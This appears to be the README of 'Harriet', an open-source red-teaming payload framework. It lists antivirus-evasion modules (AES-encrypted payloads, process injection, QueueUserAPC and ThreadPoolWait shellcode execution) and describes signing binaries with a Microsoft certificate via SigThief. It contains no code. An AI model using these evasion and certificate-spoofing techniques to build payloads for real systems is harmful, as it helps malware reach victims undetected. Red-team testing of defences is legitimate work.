/Harriet

This repo is a resource for various red teaming techniques and tools based on open source software and non-commerical tools.

Primary LanguageC++

Harriet

This repo is a resource for various red teaming techniques and tools based on open source software and non-commerical tools.

Screen Shot 2022-10-17 at 12 14 33 PM

The payload framework is very effective when paired with my Covenant Randomizer script.

Screen Shot 2022-10-17 at 12 15 10 PM

I was able to bypass Defender with Covenant with no problems.

Screen Shot 2022-10-17 at 11 59 31 AM

I was also able to bypass Defender with a Meterpreter payload. This might not be as effective since Meterpreter is signatured so heavily. Your results will vary without modifying your Meterpreter payload's template inside Metasploit. Going with lesser used payloads will probably yield good results.

Modules

Screen Shot 2022-10-17 at 12 12 15 PM

There are four modules currently. As of this post, all of them bypass AV/Defender.

AES Encrypted payload

AES Encrypted payload with process injection

QueueUserAPC shellcode execution

ThreadPoolWait shellcode execution.

All of the modules use XOR encryption for strings and function obfuscation and AES encryption for payload exection. Once the payload is compiled, the script uses SigThief to sign the binary with a Microsoft certificate.